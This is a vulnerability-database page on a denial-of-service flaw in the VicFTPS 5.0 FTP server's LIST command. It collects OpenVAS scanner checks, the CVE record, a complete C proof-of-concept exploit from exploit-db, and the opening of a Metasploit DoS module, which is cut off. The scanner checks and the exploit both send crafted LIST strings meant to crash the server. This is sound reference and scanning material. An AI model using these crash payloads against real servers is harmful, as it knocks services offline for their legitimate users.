VicFTPS 'LIST' Command Remote Denial of Service Vulnerability
2011-02-25T00:00:00
ID OPENVAS:103091 Type openvas Reporter This script is Copyright (C) 2011 Greenbone Networks GmbH Modified 2017-09-01T00:00:00
Description
VicFTPS is prone to a remote denial-of-service vulnerability because
it fails to handle a specially crafted argument to the FTP LIST command.
Successfully exploiting this issue will allow an attacker to crash the
affected application, denying further service to legitimate users.
Arbitrary code execution may also be possible; this has not been
confirmed.
VicFTPS 5.0 is vulnerable; other versions may also be affected.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_vicftps_46546.nasl 7044 2017-09-01 11:50:59Z teissa $
#
# VicFTPS 'LIST' Command Remote Denial of Service Vulnerability
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Report text for this check; passed to the "summary" tag during registration.
tag_summary = "VicFTPS is prone to a remote denial-of-service vulnerability because
it fails to handle specially crafted input.
Successfully exploiting this issue will allow an attacker to crash the
affected application, denying further service to legitimate users.
Arbitrary code execution may also be possible; this has not been
confirmed.
VicFTPS 5.0 is vulnerable; other versions may also be affected.";

# Registration pass: when `description` is set the script only declares its
# metadata and exits; none of the network code below this block is reached.
if(description) {
  # Identity and revision bookkeeping.
  script_id(103091);
  script_name("VicFTPS 'LIST' Command Remote Denial of Service Vulnerability");
  script_version("$Revision: 7044 $");
  script_tag(name:"creation_date", value:"2011-02-25 13:54:37 +0100 (Fri, 25 Feb 2011)");
  script_tag(name:"last_modification", value:"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $");

  # External references for the issue.
  script_bugtraq_id(46546);
  script_cve_id("CVE-2008-2031");
  script_xref(name:"URL", value:"https://www.securityfocus.com/bid/46546");
  script_xref(name:"URL", value:"http://vicftps.50webs.com/");

  # Severity: CVSS v2 base score and vector (availability impact only).
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");

  # Classification. ACT_DENIAL marks this as a check that can take the
  # tested service down, so it belongs only in scans where that is acceptable.
  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_DENIAL);
  script_family("FTP");
  script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");

  # Scheduling: plugins this one depends on and the port it needs.
  # The run phase below reads "Services/ftp", "ftp/login" and "ftp/password"
  # from the knowledge base (presumably populated by these dependencies).
  script_dependencies("find_service.nasl","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
  script_require_ports("Services/ftp", 21);

  script_tag(name:"summary", value:tag_summary);
  exit(0);
}
include("ftp_func.inc");
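# Run phase of an intrusive availability check: log in to the FTP service,
# send the LIST request this plugin tests for, then see whether the port
# still accepts connections. A port that stops answering is reported.
#
# Changes from the earlier revision, all aimed at fewer false positives and
# cleaner behaviour against the tested host:
#   - honour safe_checks() explicitly before doing anything intrusive;
#   - verify every socket before using it;
#   - close the socket when the login is rejected (it was leaked before);
#   - report only if the test request was actually sent at least once, so a
#     service that merely refuses the login and later becomes unreachable
#     for an unrelated reason is not flagged.

# Never send the test request when the scan is configured for safe checks.
if(safe_checks()) exit(0);

ftpPort = get_kb_item("Services/ftp");
if(!ftpPort) ftpPort = 21;

# Skip services already marked as broken in the knowledge base, and closed ports.
if(get_kb_item('ftp/'+ftpPort+'/broken')) exit(0);
if(!get_port_state(ftpPort)) exit(0);

# Only continue against a service that identifies itself as VicFTPS.
banner = get_ftp_banner(port:ftpPort);
if(!banner || "VicFTPS" >!< banner) exit(0);

# Baseline: the port must accept a connection before the test, otherwise a
# failed connection afterwards would prove nothing.
soc1 = open_sock_tcp(ftpPort);
if(!soc1) exit(0);
close(soc1);

# Credentials: use the ones stored in the knowledge base, falling back to an
# anonymous login with an e-mail style password built from the scan domain.
domain = get_kb_item("Settings/third_party_domain");
if(isnull(domain)) domain = this_host_name();

user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if(!user) user = "anonymous";
if(!pass) pass = string("openvas@", domain);

request_sent = FALSE;

for(i = 0; i < 5; i++) {

  soc1 = open_sock_tcp(ftpPort);
  # The service may already have stopped answering after an earlier round;
  # stop here and let the final reachability test decide.
  if(!soc1) break;

  login_details = ftp_log_in(socket:soc1, user:user, pass:pass);

  if(login_details) {
    buf = string("LIST ",crap(data:"../A",length:100),"\r\n");
    send(socket:soc1, data:buf);
    request_sent = TRUE;
    close(soc1);
    sleep(1);
  } else {
    # Login rejected: nothing was tested on this connection, release it.
    close(soc1);
  }
}

# Without a successful login the request never reached the LIST handler, so
# the state of the port afterwards says nothing about this issue.
if(!request_sent) exit(0);

# Give the service time to fail (or recover) before probing it again.
sleep(5);
soc = open_sock_tcp(ftpPort);

if(!soc) {
  # NOTE(review): an unreachable port is taken as evidence of a crash; an
  # outage from another cause inside this window would be reported as well.
  security_message(port:ftpPort);
  exit(0);
}

close(soc);
exit(0);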
{"id": "OPENVAS:103091", "type": "openvas", "bulletinFamily": "scanner", "title": "VicFTPS 'LIST' Command Remote Denial of Service Vulnerability", "description": "VicFTPS is prone to a remote denial-of-service vulnerability because\nit fails to handle specially crafted input.\n\nSuccessfully exploiting this issue will allow an attacker to crash the\naffected application, denying further service to legitimate users.\nArbitrary code execution may also be possible; this has not been\nconfirmed.\n\nVicFTPS 5.0 is vulnerable; other versions may also be affected.", "published": "2011-02-25T00:00:00", "modified": "2017-09-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=103091", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["https://www.securityfocus.com/bid/46546", "http://vicftps.50webs.com/"], "cvelist": ["CVE-2008-2031"], "lastseen": "2017-09-04T14:20:15", "viewCount": 1, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2017-09-04T14:20:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2031"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900580", "OPENVAS:1361412562310103091", "OPENVAS:900580"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WINDOWS/FTP/VICFTPS50_LIST"]}, {"type": "exploitdb", "idList": ["EDB-ID:6834"]}], "modified": "2017-09-04T14:20:15", "rev": 2}, "vulnersScore": 8.0}, "pluginID": "103091", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vicftps_46546.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or 
modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"VicFTPS is prone to a remote denial-of-service vulnerability because\nit fails to handle specially crafted input.\n\nSuccessfully exploiting this issue will allow an attacker to crash the\naffected application, denying further service to legitimate users.\nArbitrary code execution may also be possible; this has not been\nconfirmed.\n\nVicFTPS 5.0 is vulnerable; other versions may also be affected.\";\n\n\nif (description)\n{\n script_id(103091);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-25 13:54:37 +0100 (Fri, 25 Feb 2011)\");\n script_bugtraq_id(46546);\n script_cve_id(\"CVE-2008-2031\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/46546\");\n script_xref(name : \"URL\" , value : \"http://vicftps.50webs.com/\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"This script is Copyright (C) 
2011 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\",\"secpod_ftp_anonymous.nasl\",\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\nftpPort = get_kb_item(\"Services/ftp\");\nif(!ftpPort){\n ftpPort = 21;\n}\n\nif(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0);\n\nif(!get_port_state(ftpPort)){\n exit(0);\n}\n\nbanner = get_ftp_banner(port:ftpPort);\nif(!banner || \"VicFTPS\" >!< banner)exit(0);\n\nsoc1 = open_sock_tcp(ftpPort);\nif(!soc1){\n exit(0);\n}\n\nclose(soc1);\n\ndomain = get_kb_item(\"Settings/third_party_domain\");\nif(isnull(domain)) {\n domain = this_host_name();;\n} \n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif(!user)user = \"anonymous\";\nif(!pass)pass = string(\"openvas@\", domain);;\n\nfor(i=0;i<5;i++) {\n\n soc1 = open_sock_tcp(ftpPort);\n login_details = ftp_log_in(socket:soc1, user:user, pass:pass);\n\n if(login_details) {\n\n buf = string(\"LIST \",crap(data:\"../A\",length:100),\"\\r\\n\");\n send(socket:soc1, data:buf);\n close(soc1);\n sleep(1);\n\n }\n}\n\nsleep(5);\nsoc = open_sock_tcp(ftpPort);\n\nif(!soc) {\n security_message(port:ftpPort);\n exit(0);\n} else {\n close(soc);\n} \n\nexit(0); \n\n \n", "naslFamily": "FTP"}
{"cve": [{"lastseen": "2020-10-03T11:50:59", "description": "VicFTPS 5.0 allows remote attackers to cause a denial of service (crash) via a crafted LIST command, which triggers a NULL pointer dereference. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "edition": 3, "cvss3": {}, "published": "2008-04-30T16:17:00", "title": "CVE-2008-2031", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2031"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:vicftps:vicftps:5.0"], "id": "CVE-2008-2031", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2031", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:vicftps:vicftps:5.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-03-26T19:10:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031"], "description": "VicFTPS is prone to a remote denial-of-service vulnerability because\n it fails to handle specially crafted input.", "modified": "2020-03-24T00:00:00", "published": "2011-02-25T00:00:00", "id": "OPENVAS:1361412562310103091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103091", "type": "openvas", "title": "VicFTPS 'LIST' Command Remote Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael 
Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103091\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-25 13:54:37 +0100 (Fri, 25 Feb 2011)\");\n script_bugtraq_id(46546);\n script_cve_id(\"CVE-2008-2031\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/46546\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/vicftps/detected\");\n\n script_tag(name:\"summary\", value:\"VicFTPS is prone to a remote denial-of-service vulnerability because\n it fails to handle 
specially crafted input.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue will allow an attacker to crash the\n affected application, denying further service to legitimate users. Arbitrary code execution may also be possible.\n This has not been confirmed.\");\n\n script_tag(name:\"affected\", value:\"VicFTPS 5.0 is vulnerable. Other versions may also be affected.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of\n this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:ftpPort);\nif(!banner || \"VicFTPS\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nbanner = ftp_recv_line(socket:soc);\nftp_close(socket:soc);\nif(!banner || \"VicFTPS\" >!< banner){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nfor(i = 0; i < 5; i++ ) {\n soc1 = open_sock_tcp(ftpPort);\n login_details = ftp_log_in(socket:soc1, user:user, pass:pass);\n if(login_details) {\n buf = string(\"LIST \",crap(data:\"../A\",length:100),\"\\r\\n\");\n send(socket:soc1, data:buf);\n close(soc1);\n sleep(1);\n }\n}\n\nsleep(5);\nsoc = open_sock_tcp(ftpPort);\n\nif(!soc) {\n security_message(port:ftpPort);\n exit(0);\n} else {\n close(soc);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:14:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "description": "This host is running VicFTPS FTP Server which is prone to\nDenial of Service Vulnerability.", "modified": 
"2017-01-31T00:00:00", "published": "2009-06-26T00:00:00", "id": "OPENVAS:900580", "href": "http://plugins.openvas.org/nasl.php?oid=900580", "type": "openvas", "title": "VicFTPS LIST Command Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_vicftps_list_dos_vuln.nasl 5148 2017-01-31 13:16:55Z teissa $\n#\n# VicFTPS LIST Command Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows attackers to execute arbitrary\ncode, and can crash the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"VicFTPS Version 5.0 and prior on Windows.\";\n\ntag_insight = \"A NULL pointer dereference error exists while processing\nmalformed arguments passed to a LIST command that starts with a '/\\/' (forward\nslash, backward slash, forward slash).\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. 
Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is running VicFTPS FTP Server which is prone to\nDenial of Service Vulnerability.\";\n\nif(description)\n{\n script_id(900580);\n script_version(\"$Revision: 5148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-26 07:55:21 +0200 (Fri, 26 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2008-6829\", \"CVE-2008-2031\");\n script_bugtraq_id(28967);\n script_name(\"VicFTPS LIST Command Denial of Service Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://milw0rm.com/exploits/6834\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/29943\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\ninclude(\"version_func.inc\");\n\nvicPort = get_kb_item(\"Services/ftp\");\nif(!vicPort){\n vicPort = 21;\n}\n\nif(!get_port_state(vicPort)){\n exit(0);\n}\n\nif(safe_checks() || \"VicFTPS\" >!< get_ftp_banner(port:vicPort)){\n exit(0);\n}\n\nsoc = open_sock_tcp(vicPort);\nif(!soc){\n exit(0);\n}\n\n# 
Authenticate with anonymous user (Before crash)\nif(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\")){\n exit(0);\n}\n\nfor(i = 0; i < 3; i++)\n{\n cmd = \"LIST /\\/\";\n ftp_send_cmd(socket:soc, cmd:cmd);\n sleep(5);\n ftp_close(soc);\n\n # Check for VicFTPS Service Status\n soc = open_sock_tcp(vicPort);\n if(!soc)\n {\n security_message(vicPort);\n exit(0);\n }\n else\n {\n if(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\"))\n {\n security_message(vicPort);\n ftp_close(soc);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-03-26T19:11:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "description": "This host is running VicFTPS FTP Server which is prone to\n Denial of Service Vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2009-06-26T00:00:00", "id": "OPENVAS:1361412562310900580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900580", "type": "openvas", "title": "VicFTPS LIST Command Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VicFTPS LIST Command Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900580\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-06-26 07:55:21 +0200 (Fri, 26 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2008-6829\", \"CVE-2008-2031\");\n script_bugtraq_id(28967);\n script_name(\"VicFTPS LIST Command Denial of Service Vulnerability\");\n script_xref(name:\"URL\", value:\"http://milw0rm.com/exploits/6834\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/29943\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/vicftps/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to execute arbitrary\n code, and can crash the affected application.\");\n\n script_tag(name:\"affected\", value:\"VicFTPS Version 5.0 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"A NULL pointer dereference error exists while processing\n malformed arguments passed to a LIST command that starts with a '/\\/' (forward\n slash, backward slash, forward slash).\");\n\n script_tag(name:\"solution\", value:\"No known 
solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running VicFTPS FTP Server which is prone to\n Denial of Service Vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nvicPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:vicPort);\nif(!banner || \"VicFTPS\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(vicPort);\nif(!soc)\n exit(0);\n\nif(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\"))\n exit(0);\n\nfor(i = 0; i < 3; i++)\n{\n cmd = \"LIST /\\/\";\n ftp_send_cmd(socket:soc, cmd:cmd);\n sleep(5);\n ftp_close(soc);\n\n soc = open_sock_tcp(vicPort);\n if(!soc) {\n security_message(port:vicPort);\n exit(0);\n } else {\n if(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\")) {\n security_message(port:vicPort);\n exit(0);\n }\n ftp_close(soc);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T01:46:13", "description": "vicFTP 5.0 (LIST) Remote Denial of Service Exploit. CVE-2008-2031,CVE-2008-6829. 
Dos exploit for windows platform", "published": "2008-10-24T00:00:00", "type": "exploitdb", "title": "vicFTP 5.0 LIST Remote Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "modified": "2008-10-24T00:00:00", "id": "EDB-ID:6834", "href": "https://www.exploit-db.com/exploits/6834/", "sourceData": "#include <cstdio>\n#include <winsock2.h>\n#include <memory.h>\n#define __z00ro(a) memset(a,0,sizeof(a));\n\n//greetings : SiD.psycho \n//Smallest greetings : Gorion - lofamy cIem We want be like y0U :***\n\nunsigned int setport(const char* port){\n if((atoi(port)==0) || (atoi(port)<0)){\n return 21;\n }\n return atoi(port); \n} \n\nint main(int argc,char **argv){\n\nprintf(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"\n \"+=========== vicFTPS v 5.0 REMOTE dos POC ;[ ===========+\\n\"\n \"+=========== Alfons Luja sp Z.0.0 ===========+\\n\"\n \"+=========== I want clear b00f not a d0s !!! ===========+\\n\"\n \"+=========== Propably 0 dAy ===========+\\n\"\n \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\");\nif(argc<3){\n printf(\"\\nuse poc.exe IP PORT\\n\");\n return 0;\n}\nint socks;\nhostent *host;\nWSADATA WSA;\nSOCKADDR_IN aip;\nchar recvs[666]={0}; //ave\nchar test[66]={0}; // 4 nothing\nconst char *login = \"USER Anonymous\\r\\n\"; \nconst char *pass = \"PASS echo@gov.tr\\r\\n\";\nstrcpy(test,\"LIST /\\\\/iWana_be_like_Gorion\\\\\");\nmemset(test+strlen(\"LIST /\\\\/iWana_be_like_Gorion\\\\\"),0x42,sizeof(test));\ntest[sizeof(test)-2]='\\r';\ntest[sizeof(test)-1]='\\n';\ntest[sizeof(test)]='\\0';\nprintf(\"\\nTarget:%s\\nPort:%u\\n\",argv[1],setport(argv[2]));\nif((WSAStartup(MAKEWORD(4, 2), &WSA))==0){\n if((socks = socket(AF_INET,SOCK_STREAM,0)) != -1){\n aip.sin_family = AF_INET;\n aip.sin_addr.s_addr = inet_addr(argv[1]);\n aip.sin_port = htons(setport(argv[2]));\n memset(&(aip.sin_zero),'0',8);\n if(connect(socks,(struct sockaddr*)&aip,sizeof(struct sockaddr)) == 
0){\n recv(socks,recvs,sizeof(recvs)-1,0);\n __z00ro(recvs);\n send(socks,login,strlen(login),0);\n recv(socks,recvs,sizeof(recvs)-1,0);\n __z00ro(recvs);\n send(socks,pass,strlen(pass),0);\n recv(socks,recvs,sizeof(recvs)-1,0); \n printf(\"%s\",recvs);\n if(!strncmp(recvs,\"230 fake user logged in.\",3)){\n printf(\"Send greeting!!\\n\"); \n __z00ro(recvs);\n send(socks,test,sizeof(test),0); \n recv(socks,recvs,sizeof(recvs)-1,0); \n Sleep(200); \n printf(\"Server is charmed and died happy!!\\n\"); \n }\n else{\n printf(\"Target dont love us . You must have account :[\\r\\n\");\n closesocket(socks); \n WSACleanup();\n return 0; \n } \n }\n else {\n printf(\"(__eRROR):[Connection error](!!!!)\\n\"\n \"It can be bad port number or IP addresss!\\n\");\n closesocket(socks); \n WSACleanup();\n return 0; \n } \n }\n WSACleanup();\n } \nreturn 0; \n}\n\n\n//~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~\n\n// milw0rm.com [2008-10-24]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6834/"}], "metasploit": [{"lastseen": "2020-02-11T20:46:55", "description": "The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command\n", "published": "2009-01-09T05:33:26", "type": "metasploit", "title": "Victory FTP Server 5.0 LIST DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/VICFTPS50_LIST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Victory FTP Server 5.0 LIST DoS',\n 'Description' => %q{\n The Victory FTP Server v5.0 can be brought down by sending\n a very 
